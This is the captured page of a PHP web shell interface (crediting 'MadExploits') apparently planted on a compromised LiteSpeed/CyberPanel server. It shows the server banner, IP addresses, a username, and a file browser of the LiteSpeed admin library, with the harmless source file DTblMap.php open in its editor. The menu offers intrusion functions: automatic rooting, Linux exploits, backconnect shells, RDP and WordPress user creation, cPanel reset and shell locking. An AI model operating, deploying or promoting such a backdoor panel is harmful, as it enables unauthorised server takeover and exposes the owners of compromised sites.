Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
ows
[ DIR ]
drwxr-xr-x
util
[ DIR ]
drwxr-xr-x
CAuthorizer.php
9.56
KB
-rw-r--r--
CData.php
36.55
KB
-rw-r--r--
CNode.php
21.42
KB
-rw-r--r--
CValidation.php
21.7
KB
-rw-r--r--
ControllerBase.php
15.46
KB
-rw-r--r--
DAttrBase.php
12.63
KB
-rw-r--r--
DAttrHelp.php
2.05
KB
-rw-r--r--
DInfo.php
16.55
KB
-rw-r--r--
DKeywordAlias.php
1.49
KB
-rw-r--r--
DMsg.php
8.01
KB
-rw-r--r--
DPage.php
3.62
KB
-rw-r--r--
DTbl.php
19.03
KB
-rw-r--r--
DTblDefBase.php
64.83
KB
-rw-r--r--
DTblMap.php
5.29
KB
-rw-r--r--
LogViewer.php
7.64
KB
-rw-r--r--
PathTool.php
4.63
KB
-rw-r--r--
PlainConfParser.php
9.46
KB
-rw-r--r--
SInfo.php
7.28
KB
-rw-r--r--
XmlParser.php
2.45
KB
-rw-r--r--
blowfish.php
25.68
KB
-rw-r--r--
jCryption.php
19.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DTblMap.php
<?php class DTblMap { private $_layer; private $_map; // array of string: tid or submap private $_extended_map; public function __construct($layer, $map, $extended_map = null) { $this->_layer = $layer; $this->_map = $map; $this->_extended_map = $extended_map; } public function GetLoc($index = 0) { return is_array($this->_layer) ? $this->_layer[$index] : $this->_layer; } public function GetMaps($extended) { $maps = is_array($this->_map) ? $this->_map : array($this->_map); if ($extended && $this->_extended_map != null) { if (is_array($this->_extended_map)) $maps = array_merge($maps, $this->_extended_map); else $maps[] = $this->_extended_map; } return $maps; } public function FindTblLoc($tid) { $location = $this->_layer; // page data, layer is not array $maps = $this->GetMaps(true); foreach ($maps as $m) { if (is_a($m, 'DTblMap')) { $nextloc = $m->FindTblLoc($tid); if ($nextloc != null) { return ($location == '') ? $nextloc : "{$location}:$nextloc"; } } elseif ($tid == $m) { return $location; } } return null; } public function Convert($srcloc_index, $srcnode, $dstloc_index, $dstnode) { $srcloc = $this->GetLoc($srcloc_index); $dstloc = $this->GetLoc($dstloc_index); $srclayer = $srcnode->LocateLayer($srcloc); if ($srclayer == null) { return; } $tonode = $dstnode->AllocateLayerNode($dstloc); $is_multi = (strpos($dstloc, '*') !== false ); $map = $this->GetMaps(false); if ($is_multi) { // get last layer $k0 = strrpos($dstloc, ':'); if ($k0 === false) $k0 = 0; else $k0 ++; $type = CNode::BM_BLK | CNode::BM_MULTI; $k1 = strrpos($dstloc, '$'); if ($k1 === false) { $key = ($k0 > 0) ? substr($dstloc, $k0) : $dstloc; } else { $key = substr($dstloc, $k0, $k1 - $k0); $type |= CNode::BM_VAL; } $key = ltrim($key, '*'); if (!is_array($srclayer)) $srclayer = array($srclayer); foreach ($srclayer as $fromnode) { $child = new CNode($key, null, $type); // value will be set later $this->convert_map($map, $srcloc_index, $fromnode, $dstloc_index, $child); $tonode->AddChild($child); } } else { $this->convert_map($map, $srcloc_index, $srclayer, $dstloc_index, $tonode); } } private function convert_map($map, $srcloc_index, $srcnode, $dstloc_index, $dstnode) { foreach ($map as $m) { if (is_a($m, 'DTblMap')) $m->Convert($srcloc_index, $srcnode, $dstloc_index, $dstnode); else $this->convert_tbl($m, $srcnode, $dstnode); } } private function convert_tbl($tid, $srcnode, $dstnode) { $tbl = DTblDef::GetInstance()->GetTblDef($tid); $attrs = $tbl->Get(DTbl::FLD_DATTRS); $index = $tbl->Get(DTbl::FLD_INDEX); foreach ($attrs as $attr) { if ($attr == null || $attr->_type == 'action' || $attr->IsFlagOn(DAttr::BM_NOFILE)) continue; $key = $attr->GetKey(); $layerpos = strpos($key, ':'); if ($layerpos > 0) { $layer = substr($key, 0, $layerpos); $key = substr($key, $layerpos + 1); $snode = $srcnode->LocateLayer($layer); if ($snode == null) { //echo "attr layer loc $layer return null\n"; continue; } $dnode = $dstnode->AllocateLayerNode($layer); } else { $snode = $srcnode; $dnode = $dstnode; } $from = $snode->GetChildren($key); if ($from == null) { $val = ($key == $index) ? $snode->Get(CNode::FLD_VAL) : ''; if ($val == '' && !$attr->IsFlagOn(DAttr::BM_NOTNULL)) continue; $from = new CNode($key, $val); } else { $snode->RemoveChild($key); } if (is_array($from)) { foreach ($from as $fnode) { $fnode->Set(CNode::FLD_PRINTKEY, $key); $dnode->AddChild($fnode); } } else { $from->Set(CNode::FLD_PRINTKEY, $key); $dnode->AddChild($from); if ($key == $index) { $from->AddFlag(CNode::BM_IDX); $dnode->SetVal($from->Get(CNode::FLD_VAL)); } if ($attr->IsFlagOn(DAttr::BM_RAWDATA)) { $from->AddFlag(CNode::BM_RAW); } } } if (($subtid = $tbl->GetSubTid($dstnode)) != null) { $this->convert_tbl($subtid, $srcnode, $dstnode); } if (!$srcnode->HasDirectChildren()) $srcnode->RemoveFromParent(); } }
Close